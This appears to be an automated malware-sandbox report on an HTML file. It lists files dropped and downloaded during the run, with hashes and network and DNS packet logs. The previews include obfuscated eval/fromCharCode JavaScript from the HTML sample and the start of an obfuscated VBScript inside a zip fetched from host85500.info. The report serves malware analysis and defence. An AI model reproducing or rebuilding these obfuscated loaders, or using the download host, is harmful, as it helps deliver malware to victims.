                                                                                                                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJtYW5pZmVzdC5qc29uIiwicm9vdF9oYXNoIjoiY2pCTU9ENUhPaGxuSFBWa3ktcnNIZS02b05SY0dhTmRDZWpsVF9lR3lKMCJ9LHsicGF0aCI6Im9wdGltaXphdGlvbi1oaW50cy5wYiIsInJvb3RfaGFzaCI6Ild4OGlreFBqZ0tkZ3ZENFZwTy1BUWhyZ3U5REFDSVBOZVVKME9Pb2ZPSHMifV0sImZvcm1hdCI6InRyZWVoYXNoIiwiaGFzaF9ibG9ja19zaXplIjo0MDk2fV0sIml0ZW1faWQiOiJsbWVsZ2xlamhlbWVqZ2lucGJvYWdkZGdkZmJlcGdtcCIsIml0ZW1fdmVyc2lvbiI6IjQ4NSIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"c2YuIvBAOpu6lwVnik1D6hKwDqrXbllWMI_mZ7Bx8OHQidU3h9Lv6oVIyiNvoViXMqkHKDJzd14YDbN41jK03q3fVahN4BbMuj3raXfrSnJPzxhANz10bKYdv9qe1cqCyH3wsUYHEf7NcdoaoWs_ju0cPEN7Mr5nrWeUUeuQGSSpDJ2BlqaUebzfQmlW4PmlKDK2BVeSPGHQM5cViCb9MkwIR0qKK3pGG8ZpfFwZrI0aQNu9Qm1K_tzdTKgkxWlTlPNq4-H1CdP8U-vj0Sg5cvqdf1LaM8UP3gZAvumCqafJ-HxHummIUxQQb07KH1ZmOgqC1pVqSNToepRb6IfywErG_
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.967505294252921
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SdB5DlGTRQQIcdVQwS4+Ti8J63:SRGCQhXQnkC+
                                                                                                                                                                                                                                                            MD5:910F096A2D9837929F2EE68242E699D0
                                                                                                                                                                                                                                                            SHA1:C84F399D1A8A69021B9077B3DC44E3CF8435EF9D
                                                                                                                                                                                                                                                            SHA-256:081D741DE7AD4603A8DDCB7CEEC8A2A5B50B5AE937DFFD4057282491D8AADD7E
                                                                                                                                                                                                                                                            SHA-512:0A8DD9B45D99988D6BCE4BE1BBCD1D5346EDE91AB9A7B5559D49A38E3A03200521C020D02448540C34F372AEB2E1883DF1F5B60FAA60DD20DECC2D3E6DEC8E0C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.8c3f6fa4ef36db7c34c635c3cb558980583d87a4a22fd7b798d0e5953c7e1209
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):108
                                                                                                                                                                                                                                                            Entropy (8bit):4.481149880283266
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFzIe4/+S1YDHcDKhtH8tAn:F6VlMQ/+S1oSKH8tAn
                                                                                                                                                                                                                                                            MD5:A9F4244A5F340DF58E2CDEA7A1C119D7
                                                                                                                                                                                                                                                            SHA1:E0AAC07BAF496A98984013039EEC204254104D3A
                                                                                                                                                                                                                                                            SHA-256:72304C383E473A19671CF564CBEAEC1DEFBAA0D45C19A35D09E8E54FF786C89D
                                                                                                                                                                                                                                                            SHA-512:0593FBFB61DCE139518A30A0B36CB932FF787B2B418CDFFA8F4FE9EEAC1DD6B8BEB05A286D101D1CA1742D55867999C357B4806A314647D7E87F6CC88152BC0B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "Optimization Hints",. "version": "485",. "ruleset_format": "1.0.0".}
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):54555
                                                                                                                                                                                                                                                            Entropy (8bit):7.976494093010255
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:/zehGBKxdYm83YG3iHb8fZANCdX4Sjsxe9Ch:x0xW3YG3i78fZk67jsaCh
                                                                                                                                                                                                                                                            MD5:C9E46E0D5ABD5A74A27E319130D76CA6
                                                                                                                                                                                                                                                            SHA1:DCC348A55CC829F0D58E52B4B4AFF61908C63FFF
                                                                                                                                                                                                                                                            SHA-256:81B30800093D14E8BD868622D4414B96FB6F73378838139AA1933270AABAF7BD
                                                                                                                                                                                                                                                            SHA-512:D727D850F02A5FCAC8A9D8AB891A3AFEDA5092BDE5035119B9976B7ADFF630322B50F5F29AD6F3C38336D780C117DDE2ACE041A13B256978718B9CC695E135D9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:............I.....g2.I..jI..n).+..)...h.+.A7p..q.:S4.Z...O.. R..|....Da.e.?..W.-..ni2.....[.....6%8....x..y".b.Y7^.n......%/...f..c../.CY....j..|].b..+.f..].{S.s..J...|..nn..G..jb).Mn..../....R%.Fm.....K.....&.n.P.]..M.q:E..#^..O.....+...%|{....5d..............=....X......._...OS1...+.q...7..vzf.....(....iVp....7..."QA.k`......Q...Y../X4..`...<+.@.U...m .'.X6...-.aD....<..w..7bv.e......<~.J.d...i..7..o}x_...B.T....V.et....u.{/.....p6.....t.Y(a.E......t.....P..45.a...!B-......B.RY#H....E....%...I..a.....$...T....7;...y..`.l.p..kv..`..q]...z.9rX...Rb..Q.N..../.>....p.ah.........z.\.Y}2W..o.?..-6=y...2[:..t7(t)....^.H...cl"]F."..@'h....t..s..Pf..SA.yCs....IuT..=.6...{...X....,...}.....ddE.2............YU..HQ..h.i.v...;..b....}.]K..../O.....]S~.l.H...........&....~m....3..l.l*RN"..k..1f.x.$..n...P-..](.Z./.........9...WJ\. /.B.Q....h.R...e.............Fg]...........?.Z..iH.Kyxc.e.P...H.....1N.Ac.;.4..he..b.V.w..'.....Z...K.4......p...2..9.s.."
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14111
                                                                                                                                                                                                                                                            Entropy (8bit):4.235871048140784
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:tN//g5o3l2nheuRu9FskIi+X3HPQXOLtfuTdQxHQnvxu79ma:txY23lu4sxHHH4XOLthHQnpu79R
                                                                                                                                                                                                                                                            MD5:2732BA56F240D5FAE4400C311ED9D221
                                                                                                                                                                                                                                                            SHA1:8D7286D178FB0A08635C978BBC9C8BEC418DC235
                                                                                                                                                                                                                                                            SHA-256:2BD8F3C6CA21F2CFDA1E702928290000068D385E02A75462C6B0ED2A95EEBB44
                                                                                                                                                                                                                                                            SHA-512:E6D127AB217CDAC5B2610EFBA3F74C287569FD04014414DB175F6EA4117C68F32FB69A8DDE395A70894EE2B3D828121403994DA0ED7003285CBABB9D4B5D2498
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            URL:https://host85500.info:15322/uloqorcurxxjc.php?Q2ZGN01XcTdhRw==
                                                                                                                                                                                                                                                            Preview:PK.........7AZ..;..6...6......2025010453906.vbslpAridpqPAktwPTQljJqUGvWO = Split("FoALwtGr EacALwtGh QRXVRdWOXPQsUORyMgoCWOmisJJx IALwtGn SplALwtGit(""-52+209Li152+36Li440/ALwtG4Li588/ALwtG4Li614-422Li576/ALwtG3Li378/ALwtG2Li576/ALwtG3Li-128+238Li480/ALwtG3Li-274+453Li386/ALwtG2Li-184+379Li390-203Li358/ALwtG2Li440/4Li312/2Li413-234Li-259+457Li388/2Li330/3Li474-338Li228-118Li330/3Li304-194Li372-211Li537/3Li776/4Li-164+274Li576/3Li379-200Li382/2Li314/2Li-130+306Li676-492Li330/3Li64+75Li574-464Li-156+301Li-82+274Li414-235Li525/3Li582/3Li-158+337Li471/3Li411-235Li329-145Li656-477Li518-341Li221-27Li351-233Li506-394Li-89+276Li-85+278Li505-307Li274-87Li-13+199Li384/3Li248/2Li-251+449Li374/2Li-202+388Li392-210Li-200+394Li776/4Li-34+224Li-309+421Li-4+123Li-238+348Li211-75Li330/3Li95+15Li-299+409Li150-5Li350/2Li558/3Li91+95Li-351+461Li276-84Li716/4Li366-175Li628/4Li704/4Li77+107Li161-37Li116+41Li137+53Li-31+210Li416-228Li472/4Li224/2Li-269+418Li351-172Li776/4Li502-390Li151-29Li398-288Li204-92Li7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):376
                                                                                                                                                                                                                                                            Entropy (8bit):5.175134110355963
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                                                                                                                                                                                                                            MD5:C2B26B17141E97DA490556030D44F1C3
                                                                                                                                                                                                                                                            SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                                                                                                                                                                                                                            SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                                                                                                                                                                                                                            SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            URL:https://s4.histats.com/stats/0.php?4926117&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2
                                                                                                                                                                                                                                                            Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
Size (bytes):376
Entropy (8bit):5.175134110355963
Encrypted:false
SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
MD5:C2B26B17141E97DA490556030D44F1C3
SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
Malicious:false
Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();

File type:HTML document, ASCII text, with very long lines (65438), with CRLF line terminators
Entropy (8bit):3.353072224088025
TrID:
• HyperText Markup Language (15015/1) 30.02%
• HyperText Markup Language (12001/1) 23.99%
• HyperText Markup Language (12001/1) 23.99%
• HyperText Markup Language (11001/1) 21.99%
File name:CfF7MWq7aG.html
File size:109'998 bytes
MD5:b235a6019e401173f74c6b6487bc5c50
SHA1:0050ea0f086beffecaee1eba84d7e8f6d907d93e
SHA256:9182073a7541a8d2db5f94d7a980d70a9ce499c9ec55395fa968ecc65c828dfc
SHA512:326a3d4c6a5f608338ef703cabee2fd93d4fd1669911062f8df2e42aa5a3d0969e34ed09caef854af9296d9f67aa0c1b771c3962eb6760682be10167db478503
SSDEEP:1536:Ay5WnjMivVu6YPLY3fUZNDUy6nntAI2j0CkKuO/X9kkIEC213:AFDvQFPM36DU9nntAI2jYKtv9kkIEC2F
TLSH:57B369BC3442754765C645F5BE478FE4A839B7DA9B05AAB8412803B1C53CEEEA81D0CF
File Content Preview:<!DOCTYPE html>..<html>.. <head>.. <meta charset="utf-8">.. </head>.. <body>.. <script>.. var cMSlsOyEBU = "evaFbThgfKl(\"ByGdLQzofBmSPTJYjidEUysIGsxk = ''; \" + StrinFbThgfKg.fromChaFbThgfKrCode.applFbThgfKy(null, \"90+12WW108+9WW133-23WW10


• Total Packets: 113
• 15322 (undefined)
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384185076 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384193897 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384216070 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384231091 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384243011 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384246111 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384269953 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384941101 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384962082 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.384995937 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385226011 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385245085 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385256052 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385267973 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385297060 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.385360003 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.432921886 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.489974976 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:33.534858942 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.814457893 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.814497948 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.818557024 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.818764925 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:34.818778992 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.461626053 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.469517946 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.469535112 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.470551014 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.470650911 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.480362892 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.480444908 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.536552906 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.536567926 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:35.580678940 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:38.389884949 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:38.389894009 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:38.389952898 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.265290976 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.265290976 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.270143032 CET153224974145.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:39.270262003 CET4974115322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:41.707484007 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:41.707573891 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:41.707607985 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.240858078 CET49736443192.168.2.4142.4.219.198
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.240884066 CET44349736142.4.219.198192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.708806992 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.708836079 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.708937883 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.725229979 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:43.725245953 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.308083057 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.308183908 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363190889 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363214016 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363496065 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.363662004 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.367409945 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.411324024 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490168095 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490242004 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490266085 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.490361929 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.491471052 CET49748443192.168.2.454.39.156.32
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:44.491494894 CET4434974854.39.156.32192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.372728109 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.372797966 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.372843981 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.777489901 CET49744443192.168.2.4142.250.186.36
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:45.777508974 CET44349744142.250.186.36192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.418104887 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.422915936 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.423019886 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.430562973 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:46.435434103 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.076719046 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.076730967 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.076862097 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.101449013 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.106240988 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.299694061 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.313689947 CET4975715322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:47.320018053 CET153224975745.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:53.282269001 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:53.282529116 CET153224974045.93.9.167192.168.2.4
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:53.282581091 CET4974015322192.168.2.445.93.9.167
                                                                                                                                                                                                                                                            Feb 5, 2025 07:56:55.239195108 CET4974015322192.168.2.445.93.9.167
Feb 5, 2025 07:56:55.243969917 CET | 15322 | 49740 | 45.93.9.167 | 192.168.2.4
Feb 5, 2025 07:57:32.572304964 CET | 56878 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:57:32.577208996 CET | 53 | 56878 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:32.577322006 CET | 56878 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:57:32.582068920 CET | 53 | 56878 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:33.026823044 CET | 56878 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:57:33.031841993 CET | 53 | 56878 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:33.031939030 CET | 56878 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:57:34.864906073 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:34.864959002 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:34.865052938 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:34.865284920 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:34.865302086 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:35.515782118 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:35.516330004 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:35.516357899 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:35.516685963 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:35.517047882 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:35.517132044 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:35.566554070 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:36.660382032 CET | 49724 | 80 | 192.168.2.4 | 199.232.214.172
Feb 5, 2025 07:57:36.669055939 CET | 80 | 49724 | 199.232.214.172 | 192.168.2.4
Feb 5, 2025 07:57:36.669128895 CET | 49724 | 80 | 192.168.2.4 | 199.232.214.172
Feb 5, 2025 07:57:45.428385973 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:45.428453922 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:57:45.428498030 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:47.240155935 CET | 56893 | 443 | 192.168.2.4 | 142.250.186.36
Feb 5, 2025 07:57:47.240166903 CET | 443 | 56893 | 142.250.186.36 | 192.168.2.4
Feb 5, 2025 07:58:26.390721083 CET | 49757 | 15322 | 192.168.2.4 | 45.93.9.167
Feb 5, 2025 07:58:26.396091938 CET | 15322 | 49757 | 45.93.9.167 | 192.168.2.4
Feb 5, 2025 07:58:26.396155119 CET | 49757 | 15322 | 192.168.2.4 | 45.93.9.167
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 5, 2025 07:56:30.812167883 CET | 53 | 58276 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:30.869518995 CET | 53308 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:30.869728088 CET | 60606 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:30.872422934 CET | 53 | 65107 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:30.879329920 CET | 53 | 53308 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:30.891204119 CET | 53 | 60606 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:31.692760944 CET | 57463 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:31.693047047 CET | 59944 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:31.699425936 CET | 53 | 57463 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:31.700058937 CET | 53 | 59944 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:31.866065979 CET | 53 | 63500 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:32.326689005 CET | 54877 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:32.328186035 CET | 59212 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:32.355285883 CET | 53 | 59212 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:32.370181084 CET | 53 | 54877 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:34.805114031 CET | 62558 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:34.805114031 CET | 51394 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:34.812081099 CET | 53 | 62558 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:34.812093019 CET | 53 | 51394 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:43.324790001 CET | 53 | 63394 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:43.692955017 CET | 54277 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:43.701581955 CET | 53 | 54277 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:46.370151997 CET | 50858 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:46.398881912 CET | 53 | 50858 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:48.260035992 CET | 138 | 138 | 192.168.2.4 | 192.168.2.255
Feb 5, 2025 07:56:48.854669094 CET | 53 | 56536 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:56:58.675265074 CET | 64303 | 53 | 192.168.2.4 | 1.1.1.1
Feb 5, 2025 07:56:58.704420090 CET | 53 | 64303 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:07.588629961 CET | 53 | 63793 | 1.1.1.1 | 192.168.2.4
Feb 5, 2025 07:57:22.659790039 CET | 53503 | 53 | 192.168.2.4 | 1.1.1.1
